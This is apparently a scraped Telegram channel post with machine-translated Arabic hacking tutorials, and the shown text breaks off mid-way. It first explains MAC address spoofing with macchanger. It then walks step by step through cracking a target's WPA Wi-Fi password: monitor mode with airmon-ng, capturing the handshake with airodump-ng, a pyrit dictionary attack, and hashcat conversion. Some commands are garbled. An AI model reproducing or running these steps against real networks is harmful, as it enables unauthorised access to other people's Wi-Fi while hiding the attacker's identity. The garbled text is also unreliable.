Termux CS
4.29K subscribers
1.52K photos
66 videos
273 files
3.72K links
بوت القناة

t.me/TermuxCS_Bot
Download Telegram
في terminal
، اكتب ifconfig eth0 down يستخدم هذا الأمر لتعطيل واجهة eth0.

الآن قم بتغيير عنوان MAC باستخدام أمر بسيط في التراجع عن macchanger –r eth0

الآن اكتب
ifconfig eth0 up
، ويستخدم هذا الأمر لتمكين واجهة eth0
الآن يمكنك التحقق من نوع عنوان MAC في ifconfig
كذا غيرنا الماك تبعنا👆😊
This media is not supported in your browser
VIEW IN TELEGRAM
الشرح التالي...
طرق للقضاء على Wifi باستخدام Pyrit و oclHashcat و Cowpatty
قم أولاً ببدء وضع الشاشة على محولنا اللاسلكي.
ب الامر التالي
airmon-ng start wlan0
الآن يتم تمكين وضع الشاشة مع اسم wlan0mon.

ثم مع الأمر التالي ، ابدأ في الاستماع إلى جميع اتصالات wifi المتاحة:

airodump-ng wlan0mon
بعد تشغيل الأمر أعلاه ، سيبدأ الاستماع لكل حركة مرور wifi القريبة ، لذا انتظر حتى يظهر هدفك ، ثم اضغط على ctrl ^ c.

الآن علينا أن نستمع إلى قناة محددة يوجد عليها الهدف. الآن قم بتشغيل الأمر:

irodump-ng -c 2 –bssid 3C:1E:04:XX:XX:XX –write sommay wlan0mon

-c == رقم قناة الهدف (2 في حالتي ، راجع العمود CH)

–bssid == عنوان MAC للهدف AP

- write == اسم ملف الالتقاط
انتظر الآن حتى يتم التقاط مصافحة WPA ثم اضغط على crtl ^ c.

سيتم الآن إنشاء ملف باسم sommay-01.cap
PYRIT

الطريقة الأولى للقضاء على كلمة المرور من ملف الالتقاط هي PYRIT. سوف نستخدم القاموس الهجوم حتى تشغيل الأمر:

pyrit -i /usr/share/nmap/nselib/data/password.lst -r sommay-01.cap attack_passthrough


-i ==
المسار إلى ملف الإدخال في حالتنا هو المسار إلى القاموس

-r ==
المسار إلى الأسطول الذي تم (في حالتنا يكون sommay-01.cap)

attack_passthrough ==
هذه الخيارات هي تحديد أن هجوم القاموس يجب تنفيذه

كما ترون فقد نجحت في كسر كلمة المرور.
OCLHASHCAT

بادئ ذي بدء ، قم بتنزيل oclhashcat

من موقعه الرسمي: https://hashcat.net/files/hashcat-2.00.7z

أولاً يتعين علينا تحويل ملف .cap الذي تم التقاطه باستخدام airodump-ng مسبقًا إلى .hccap with aircrack-ng حسب الأمر:

aircrack-ng sommay-01.cap -J sommay-01

-J ==
المسار إلى ملف الإخراج مع التمديد .hccap